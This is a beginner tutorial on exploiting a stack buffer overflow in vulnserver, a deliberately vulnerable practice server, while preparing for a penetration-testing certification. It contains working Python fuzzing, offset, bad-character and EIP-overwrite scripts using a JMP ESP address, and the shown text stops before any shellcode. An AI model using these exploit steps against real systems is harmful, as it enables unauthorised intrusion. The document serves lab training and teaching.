Hack-01 Buffer Overflow

A Simple tutorial to introduce buffer overflow hacking

Date: Oct 8, 2023

In this tutorial we are going to hack a machine using a buffer overflow. Many think that it is very complicated, but TBH it's not. I am on a journey to prepare myself for the PJPT certification by TCM Security, and in that course the machine we are going to hack is the second one. It took me a whole week to research and finally crack this machine. So if you are also sitting the PJPT exam real soon, or if you just want to explore the step-by-step idea of a buffer overflow, you are in the perfect place.

Step 0

Download the machine that we want to hack with buffer overflow: vulnserver, a deliberately vulnerable Windows TCP server that listens on port 9999.

https://github.com/stephenbradshaw/vulnserver

Download Immunity Debugger. https://www.immunityinc.com/products/debugger/

This is awesome software. IDK how it is free. Using this you can hack EIP. Hack what now?

You know how we have a memory card? The RAM, yeah. So the RAM has different addresses. You can imagine it like this: RAM is a building and each address is a different apartment. In the different apartments our computer stores different values.

Every apartment has a contract stating which apartment belongs to whom. If you have the contract, the company gives you the key, and with that key you can unlock your door. The CPU also has a register called EIP, the Extended Instruction Pointer. EIP has a special power: it holds the address of the next instruction to run, so it decides where the program goes next. It's like the contract paper: whatever apartment number is written in EIP is the only room the program can enter next.

Now! What if you can hack the contract? Wink wink! When a function returns, the CPU loads EIP from the return address that was saved on the stack, and the stack lives in RAM right next to the buffer we are going to overflow. So if we write past the end of that buffer, we overwrite the saved return address, and on it we write the address of the OWNER OF THE COMPANY! You see where we are going with it? The contract now says you OWN the address where the OWNER OF THE COMPANY lives, so it gives you the key and you can enter the OWNER's PALACE! And once you enter the PALACE, boy o boy!




Step 1

Attach in Immunity Debugger

On the Windows VM, start vulnserver.exe, open Immunity Debugger as administrator, choose File > Attach, pick the vulnserver process and click Attach. Attaching leaves the process paused, so press F9 (Run) until the status in the bottom-right corner says Running; otherwise nothing you send from Kali will be processed.

Step 2

Try connecting to this machine from the Kali machine

nc -nv 192.168.0.111 9999

This should connect and show the banner, "Welcome to Vulnerable Server! Enter HELP for help." Type HELP and the server lists the commands it accepts, such as STATS, TRUN and several others. Replace the IP with your own vulnserver host; the scripts below use 10.0.2.5 and 192.168.0.111 interchangeably for the same target, so put your own address in each.



Step 3 (Spiking)

Try each of those commands (STATS, TRUN, ...) with SPIKE. Sending one command with a fuzzed argument at a time tells you which one is vulnerable: the server keeps answering for the safe ones and dies (Immunity reports an access violation) for the bad one. For each command make a separate SPIKE template like below (file names are your choice; stats.spk and trun.spk are used here),

stats.spk

s_readline();
s_string("STATS ");
s_string_variable("0");

trun.spk

s_readline();
s_string("TRUN ");
s_string_variable("0");

and feed each one to generic_send_tcp, which comes with SPIKE on Kali:

generic_send_tcp 10.0.2.5 9999 trun.spk 0 0

The two trailing zeros are SKIPVAR and SKIPSTR, i.e. start from the first variable and the first fuzz string. TRUN is the command that crashes vulnserver, so that is the one we follow from here on.



Step 4 (Fuzzing)

Now make a Python file that sends ever-larger TRUN arguments until the server stops responding, which gives the approximate number of bytes needed to crash it. Something like below,

  1. For that we need a python file, 1.py,

#!/usr/bin/env python3
import socket
import sys
from time import sleep

# Start at 100 bytes and grow by 100 each round until the server stops answering.
buffer = b"A" * 100

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('10.0.2.5', 9999))
        s.send(b"TRUN /.:/" + buffer)
        s.close()
        sleep(1)
        buffer = buffer + b"A" * 100
    except Exception:
        # The connect only fails on the round after the crash, so the real
        # crash length is roughly 100 bytes less than what is printed.
        print("Fuzzing crashed at %d bytes" % len(buffer))
        sys.exit()

  2. Change the mode to executable and run it,

chmod +x 1.py
./1.py

Watch Immunity while it runs: when the status bar reports an access violation and EIP reads 41414141 (four 'A's), the stack has been smashed. The script then reports,

Fuzzing crashed at 3000 bytes




Step 4 (continued: Finding the Offset)

After we know the approximate crash length, we need the exact offset at which the four bytes that land in EIP sit. We will make another Python file for this, but first we need a unique, non-repeating pattern of 3000 bytes. Metasploit ships a tool for that:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

(on Kali, msf-pattern_create -l 3000 is the same tool). This gives a long string like below, in which every 4-byte window occurs only once, so the value that ends up in EIP identifies its position:

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9



Now make a 2.py file that sends the pattern in place of the 'A's,

#!/usr/bin/env python3
import socket
import sys

# 3000-byte cyclic pattern from pattern_create.rb (every 4-byte window is unique)
offset = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.0.2.5', 9999))
    s.send(b"TRUN /.:/" + offset)
    s.close()
except Exception:
    print("Error connecting to server")
    sys.exit()




This overwrites EIP with four bytes of the pattern. Now copy the EIP value from the Registers pane in Immunity Debugger and give it to Metasploit to find the exact offset. In this run EIP reads 386F4337:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337

This gives the exact offset like below,

[*] Exact match at offset 2003

(386F4337 is the little-endian reading of the bytes 37 43 6F 38, i.e. "7Co8", which starts 2003 bytes into the pattern.) Now we need to verify this 2003 offset. For that create 3.py

#!/usr/bin/env python3
import socket
import sys

# 2003 bytes of filler reach the saved return address; the next 4 bytes land in EIP
shellcode = b"A" * 2003 + b"B" * 4

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.111', 9999))
    s.send(b"TRUN /.:/" + shellcode)
    s.close()
except Exception:
    print("Error connecting to server")
    sys.exit()

Restart vulnserver, re-attach Immunity and run it. If EIP shows 42424242 (four 'B's), the offset is exact and we control EIP. If it shows a mix of 41 and 42 the offset is off by a byte or two; adjust and re-run.
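To make clear what pattern_create.rb and pattern_offset.rb actually compute, here is a small Python 3 reimplementation of both, written for this write-up (it is not from the original post or from Metasploit). It builds the same cyclic pattern, converts the EIP value Immunity displays back into the little-endian bytes that sit in memory, and looks them up, reproducing the offset 2003 for 386F4337. It also builds the 3.py verification buffer so the layout can be checked before anything is sent.

```python
#!/usr/bin/env python3
"""Cyclic pattern create/offset in pure Python (what the Metasploit tools do)."""
import itertools
import string


def pattern_create(length):
    """Build the same 'Aa0Aa1Aa2...' cyclic pattern as pattern_create.rb.

    Each 3-byte triplet (upper, lower, digit) is unique, so any 4-byte window
    taken from the pattern occurs at exactly one position in it.
    """
    out = bytearray()
    for up, low, dig in itertools.product(string.ascii_uppercase,
                                          string.ascii_lowercase,
                                          string.digits):
        if len(out) >= length:
            break
        out += (up + low + dig).encode()
    return bytes(out[:length])


def pattern_offset(pattern, eip_hex):
    """Return the offset of the 4 pattern bytes that landed in EIP.

    Immunity shows EIP as a big-endian hex number (e.g. 386F4337), but x86 is
    little-endian, so in memory the bytes are reversed: 37 43 6F 38 = b"7Co8".
    That reversed string is what we search for in the pattern.
    """
    needle = bytes.fromhex(eip_hex)[::-1]
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("EIP value %s not found in pattern" % eip_hex)
    return idx


def offset_check_payload(offset):
    """The 3.py buffer: filler up to the return address, then four 'B's.

    After the crash EIP must read 42424242; anything else means the offset is wrong.
    """
    return b"A" * offset + b"B" * 4


if __name__ == "__main__":
    pat = pattern_create(3000)
    off = pattern_offset(pat, "386F4337")
    print("[*] Exact match at offset %d" % off)
    print("verification buffer is %d bytes" % len(offset_check_payload(off)))
```

pattern_offset raises rather than returning -1 when the value is not in the pattern, which is what you see when EIP holds something other than four consecutive pattern bytes (for example when the crash happened in a different code path than the one you expect).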

Step 5 (Finding the Bad Characters)

Some byte values get dropped or altered on their way into the buffer: \x00 terminates a C string, and other programs choke on bytes like \x0a or \x0d. Any such byte inside the shellcode would corrupt it, so we send every value from \x01 to \xff right after the EIP overwrite and check which ones arrive intact. To find the bad characters create 4.py.

#!/usr/bin/env python3
import socket
import sys

# every byte value except \x00, which is a string terminator and always bad here
badchars = (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
            b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
            b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
            b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
            b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
            b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
            b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
            b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
            b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
            b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
            b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
            b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
            b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
            b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
            b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
            b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

# the bytes after the EIP overwrite are exactly where ESP points after the crash
shellcode = b"A" * 2003 + b"B" * 4 + badchars

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.0.2.5', 9999))
    s.send(b"TRUN /.:/" + shellcode)
    s.close()
except Exception:
    print("Error connecting to server")
    sys.exit()

Restart vulnserver, re-attach Immunity and run the script. After the crash, go to Immunity Debugger and right click on ESP > Follow in Dump. The dump should read 01 02 03 ... FF in order; any value that is missing or changed (and everything after a value that truncated the copy) is a bad character and must be excluded from the shellcode. For vulnserver's TRUN the only bad character is \x00, which we left out of the list from the start.
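Reading 255 hex bytes off the dump pane by eye is error-prone, so here is an added Python 3 helper (written for this write-up, not part of the original post; mona.py offers the same idea with !mona bytearray and !mona compare) that generates the probe for any set of already-known bad characters and diffs it against what you copy out of the dump. The dump in the sample is constructed to show the two failure modes, a dropped byte and a mangled byte; it is not real vulnserver output, which only loses \x00.

```python
#!/usr/bin/env python3
"""Generate the bad-character probe and diff it against the bytes found at ESP."""
import difflib


def badchar_probe(exclude=(0x00,)):
    """All 256 byte values minus the ones already known to be bad.

    \x00 is excluded from the start because it terminates C strings, so the
    server would stop copying at it anyway. Re-run with a larger exclude set
    every time a new bad character is found.
    """
    return bytes(b for b in range(256) if b not in exclude)


def find_badchars(sent, dumped):
    """Return the probe bytes that did not survive the copy into the buffer.

    The dump (what Immunity shows at ESP) is aligned against the probe with
    difflib, so both a byte the server dropped and a byte it rewrote show up
    in the result. If the result is a long run starting at one byte, that
    first byte truncated the copy (e.g. a string terminator): exclude it and
    send the probe again, since nothing behind it was tested.
    """
    bad = []
    matcher = difflib.SequenceMatcher(None, sent, dumped, autojunk=False)
    for tag, i1, i2, _j1, _j2 in matcher.get_opcodes():
        if tag != "equal":
            bad.extend(sent[i1:i2])
    return bad


def fmt(byte_list):
    """Render a list of ints the way msfvenom -b expects them, e.g. \\x00\\x0a."""
    return "".join("\\x%02x" % b for b in byte_list)


# Constructed sample dump (NOT real vulnserver output): a server that drops
# \x0a and turns \x0d into a space would leave these bytes at ESP.
SAMPLE_DUMP = badchar_probe().replace(b"\x0a", b"").replace(b"\x0d", b"\x20")

if __name__ == "__main__":
    probe = badchar_probe()
    print("clean target ->", fmt(find_badchars(probe, probe)) or "(none)")
    print("sample dump  ->", fmt(find_badchars(probe, SAMPLE_DUMP)))
```

Paste the hex copied from the dump pane into bytes.fromhex() to build the dumped argument; the result of find_badchars, together with \x00, is exactly the list you hand to msfvenom with -b.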



Step 6 (Finding the right Module)

Download mona.py, Corelan's exploit-development plugin for Immunity (https://github.com/corelan/mona), and copy it to C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands

Go to Immunity Debugger, click the command bar at the bottom, type !mona modules and press Enter.

This lists the loaded modules together with their protection flags (Rebase, SafeSEH, ASLR, NXCompat). We want one with every flag set to False: an address taken from such a module does not move between restarts and has no protection we would have to bypass, so we can reliably tell the program to jump there and on to our malicious code.

In this case it will show essfunc.dll, which ships with vulnserver (our program) and has no protections at all. So this is basically a room with no security. Now we have to jump into this room so that we can do whatever we want, and to do that jump we need the opcode of the instruction we are looking for.



So to redirect execution we need two things,

The jump instruction (in the bytes the machine understands) and an address where those bytes live

The instruction we want is JMP ESP: after the crash, ESP points just past the overwritten return address, right at the bytes we control, so jumping to ESP runs whatever we put there. To translate the assembly mnemonic into opcode bytes, nasm_shell comes in.

In a terminal, run locate nasm_shell; it gives the path of the Ruby script, /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb. Run it and you get the nasm prompt,

nasm >

Now type the instruction at the prompt,

nasm > JMP ESP

It returns the opcode bytes,

00000000  FFE4              jmp esp




So we got the jump code, FF E4. Now we need an address where these two bytes occur inside essfunc.dll.

Go to Immunity Debugger and in the command bar at the bottom type this

!mona find -s "\xff\xe4" -m essfunc.dll

This gives multiple pointers, i.e. several addresses inside essfunc.dll that hold the bytes FF E4.

That means we have not one but several rooms with no security! How cool is that? Any one of them will do: we tell the program to jump to that address, it executes JMP ESP and lands in our buffer, where our code runs with whatever privileges vulnserver has. Let's start with the first address, which is 0x625011af. (It contains no \x00 byte, so it survives the string copy.)

Now create another Python file and put this address in the buffer where the four 'B's were, written in little-endian byte order (least significant byte first), because that is how x86 stores a 32-bit value in memory.

#!/usr/bin/env python3
import socket
import sys

# 0x625011af = JMP ESP inside essfunc.dll, packed little-endian
shellcode = b"A" * 2003 + b"\xaf\x11\x50\x62"

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.0.2.5', 9999))
    s.send(b"TRUN /.:/" + shellcode)
    s.close()
except Exception:
    print("Error connecting to server")
    sys.exit()







Now go to Immunity Debugger and click the "Go to address" icon at the right end of the toolbar (or press Ctrl+G in the CPU pane).

It will ask you to input the address; type 625011af.

This highlights the line at that address, and you can see it holds the JMP ESP instruction.

Now press F2, which turns the address cyan. This means we set a breakpoint here: the debugger will pause as soon as execution reaches it.

Now press the red play button (or F9), which sits below the Debug and Plugins menus. This sets Immunity Debugger from Paused to Running.

